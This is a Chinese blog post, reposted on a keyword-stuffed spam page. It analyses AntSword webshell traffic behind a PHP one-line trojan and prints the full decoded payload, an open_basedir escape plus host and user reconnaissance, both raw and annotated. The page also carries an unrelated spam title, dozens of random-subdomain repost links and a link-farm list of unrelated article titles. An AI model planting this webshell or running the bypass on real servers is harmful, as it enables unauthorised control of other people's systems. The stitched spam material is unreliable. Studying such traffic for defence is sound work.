当前位置: 首页 > wzjs >正文

做外语网站的公司王也的配音员是谁

做外语网站的公司,王也的配音员是谁,黄骅在线,使用net域名的大网站写这篇文章我的想法是,在了解文件上传漏洞之前,我们应该知道为什么要上传webshell,就像在我们磨刀之前应该要知道我们要拿刀来干啥 : ) 以一句话木马来说,就单凭一小行代码怎么能做到控制别人的服务器的呢?这是值得思…

写这篇文章我的想法是,在了解文件上传漏洞之前,我们应该知道为什么要上传webshell,就像在我们磨刀之前应该要知道我们要拿刀来干啥 : )

以一句话木马来说,就单凭一小行代码怎么能做到控制别人的服务器的呢?这是值得思考的,所以请看下文。


首先,我已经上传了一句话木马:

接下来通过对蚁剑传输流量的抓包分析:

我们能看到传输数据的字段有一大段编码和两个变量,它的工作原理是:


分为了两个字段

1:e002eeda8c12f5=[省略]

2:oupeng=eval(base64_decode($_POST('e002eeda8c12f5')))

第一个字段是base64编码后的值,解码后其内容是:

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/0ac4da9ca";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($tmdir);break;};
};;
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f9b9d"."abb3d6";echo @asenc($output);echo "c84a1"."5b471";}
ob_start();
try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as$L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;
}catch(Exception $e){echo "ERROR://".$e->getMessage();}
asoutput();
die();
?>

第二个字段则是先用 $_POST('e002eeda8c12f5') 接到这段编码

然后用eval(base64_decode())的方式把它解码,这里嵌套的目的是用eval()执行base64_decode()

于是我们就能用oupeng接到解码后的代码

最后我们在回过头看我们的一句话木马:

eval($_POST['oupeng']);

也就是说最后蚁剑将处理后的值赋给oupeng这个变量,

然后网站中的一句话木马中的$_POST['oupe]接到这个变量,也就是接到这些代码,

最后再利用eval()在网站中执行这些代码

代码作用如下:
 

<?php
// 禁止显示错误信息
@ini_set("display_errors", "0");
// 设置脚本执行时间不限制
@set_time_limit(0);// 获取 PHP 配置中的 open_basedir 值
$opdir=@ini_get("open_basedir");
if($opdir) {// 获取当前脚本所在目录$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);// 使用 base64 解码后进行拆分$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);// 将当前目录和系统临时目录添加到数组中@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {// 如果目录不可写,则继续循环if(!@is_writable($item)){continue;};// 创建一个临时目录$tmdir=$item."/0ac4da9ca";@mkdir($tmdir);// 如果目录不存在,则继续循环if(!@file_exists($tmdir)){continue;}// 获取临时目录的绝对路径$tmdir=realpath($tmdir);// 进入临时目录@chdir($tmdir);// 修改 open_basedir 为上一级目录@ini_set("open_basedir", "..");// 将路径按斜杠分隔成数组$cntarr=@preg_split("/\\\\|\\//",$tmdir);// 循环返回上级目录,直到根目录for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");}// 恢复 open_basedir 为根目录@ini_set("open_basedir","/");// 删除临时目录@rmdir($tmdir);break;};
};// 定义函数 asenc,无实际操作,直接返回输入
function asenc($out){return $out;};
// 定义函数 asoutput,将输出内容进行一些处理后输出
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "f9b9d"."abb3d6";echo @asenc($output);echo "c84a1"."5b471";}
// 开始输出缓冲区
ob_start();
try{// 获取当前脚本所在目录$D=dirname($_SERVER["SCRIPT_FILENAME"]);// 如果为空,则获取当前路径的上一级目录if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);// 将当前目录信息存入变量 $R$R="{$D}	";// 如果路径不是绝对路径,则循环遍历 A 到 Z 盘符,获取可用盘符if(substr($D,0,1)!="/"){foreach(range("C","Z")as$L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}// 添加分隔符和系统信息$R.="	";// 获取当前用户信息$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();// 添加系统信息和当前用户信息到变量 $R$R.=php_uname();$R.="	{$s}";// 输出变量 $Recho $R;
}catch(Exception $e){// 如果出现异常,则输出错误信息echo "ERROR://".$e->getMessage();
}
// 输出经过处理的内容
asoutput();
// 结束脚本
die();
?>


文章转载自:

http://jBRyXKHc.fsqbx.cn
http://BgwydNvc.fsqbx.cn
http://kNpbL1Pw.fsqbx.cn
http://5vOPQ27W.fsqbx.cn
http://PfGTnexJ.fsqbx.cn
http://d0ffaRGr.fsqbx.cn
http://dEwH2K6a.fsqbx.cn
http://9L62MpN8.fsqbx.cn
http://6vWa6r5T.fsqbx.cn
http://cpWp2Ldx.fsqbx.cn
http://veTowZjS.fsqbx.cn
http://H51nFnlv.fsqbx.cn
http://7BkzglVC.fsqbx.cn
http://JJXLvebH.fsqbx.cn
http://ZqJGQzCf.fsqbx.cn
http://2j9zDCgd.fsqbx.cn
http://uj0hMjtT.fsqbx.cn
http://9aUQbdvX.fsqbx.cn
http://l0QofAtT.fsqbx.cn
http://kZ8zx5OQ.fsqbx.cn
http://lIUGJNB9.fsqbx.cn
http://JWMdEboq.fsqbx.cn
http://OojSPZ9W.fsqbx.cn
http://gxXqu79K.fsqbx.cn
http://ujiGBnVu.fsqbx.cn
http://fng0ykIQ.fsqbx.cn
http://onB53XM2.fsqbx.cn
http://cUotcfqK.fsqbx.cn
http://0saq1RQH.fsqbx.cn
http://gMIkMQ5J.fsqbx.cn
http://www.dtcms.com/wzjs/616066.html

相关文章:

  • 烟台网站制作开发怎样开通微信公众号平台
  • 网站空间名词解释百度小说排行榜2019
  • 购物网站备案镇江百度优化
  • 做课件用这15大网站深圳网站建设前十名
  • 温州网站域名注册服务公司潍坊英文网站建设
  • 免费的购物网站源码网站设计流程的步骤
  • 长沙市网站制作哪家好wordpress mip手机主题
  • 唐山网站优化软件网站的服务器
  • 上海市城乡建设网站万网网站备份
  • 贸易公司做网站有优势吗企业咨询公司取名
  • 网站建设自身优势的分析南昌地宝网app
  • 哪个网站名片做的号怎么做捐款网站
  • 高大上的自助建站网站如何建设企业的网站
  • 手机建公司网站网站该怎么做
  • 江苏省住房保障建设厅网站织梦m网站伪静态
  • 自己做服务器和网站山东一建建设有限公司网站
  • 谷歌怎么做公司网站对网站进行seo优化
  • 济宁网站制作唐人2345网址大全首页
  • 淘宝建设网站的目的是什么意思本地化吃喝玩乐平台网站可以做吗
  • 电商公司建设网站衡阳网页设计
  • 顺丰电子商务网站建设网站建设课程体系
  • 一个网站大概多少钱wordpress一键脚本
  • 制作企业网站价格鞍山做网站团队
  • 网站平台专题如何制作家在深圳app下载
  • 免费源代码网站营销网站服务器
  • 网站设计公司 南京wordpress锚点
  • html5 网站源码山东省质量建设监督总站网站
  • 做网站推广工作赚钱吗长期网站外包
  • 网站开发报价单模板safari浏览器
  • 装修广告做哪个网站最好看做网站卖衣服物流包年多少钱